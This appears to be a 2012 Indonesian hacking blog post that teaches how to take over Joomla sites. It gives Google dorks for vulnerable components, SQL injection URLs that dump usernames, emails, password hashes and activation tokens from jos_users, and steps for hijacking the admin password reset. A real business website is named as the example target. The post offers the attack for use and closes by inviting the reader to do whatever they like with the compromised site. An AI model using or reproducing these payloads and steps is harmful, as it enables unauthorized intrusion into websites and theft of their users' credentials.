Artikel Terkini

Tuesday, September 4, 2012

exploit joomla |jos-user|

0 comments


Ok , kali ini saya mau share Exploit Joomla

Cekidoooot langsung ajahlah G Perlu Basa-basi nanti keburu Basi..hahahaha


[1] dork
: inurl:”option com_artforms” atau " inurl:"option=com_ignitegallery"

saya akan ambil contoh yang inurl:"option=com_ignitegallery"

[2] Exploit :
 index.php?option=com_ignitegallery&task=view&gallery=
-4+union+all+select+1,2,group_concat
(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,
usertype),4,5,6,7,8,9,10+from+jos_users--


[3] Reset Password : /index.php?option=com_user&view=reset


[4] Exploit Token :

/index.php?option=com_ignitegallery&task=view&gallery=
-4+union+all+select+1,2,group_concat
(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,
0x3a,activation),4,5,6,7,8,9,10+from+jos_users--

[5] login admin : /administrator


======
=step1=
======


coba

kita cari di google dengan dork ini :

inurl:"index.php
option=com_ignitegallery"

======
=step2=
======

pasang

exploitnya
exploit :
index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+
1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,
password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--
contoh :
Nah Munculkan User |  Password | Email

======
=step3=
======


coba

kita reset password nya.

password dengan menggunakan exploit ini :
/index.php?option=com_user&view=reset 


Contoh :  http://www.kaikourafishing.co.nz/index.php?option=com_user&view=reset 


hmmmm....
minta email dia.. masukin aja email admin tadi yang kita dapat.
kemudiaaan enter deh

======
=step4=
======


hmm...wah !!!

minta activation pula? tenang kita cari dulu token activationnya 

exploit nya gunakan exploit token yg di atas..

tu kan muncul token nya? yeyeyeye ...

======
=step5=
======

copas aja ke yang tadi lalu enter  

======
=step6=
======


sekarang, meminta password baru ? isilah sesuai yg agan inginkan

======
=step7=
======


oke..!!

langsung ke tahap berikutnya, sekarang kita masuk ke adminnya


http://www.kaikourafishing.co.nz/administrator/

setelah itu terserah agan mau apain itu web

::-Selamat Mencoba-::





*BERANI UNTUK MENGHADAPI
KEGAGALAN
UNTUK DAPAT
MERAIH
KEBERHASILAN*

Leave a Reply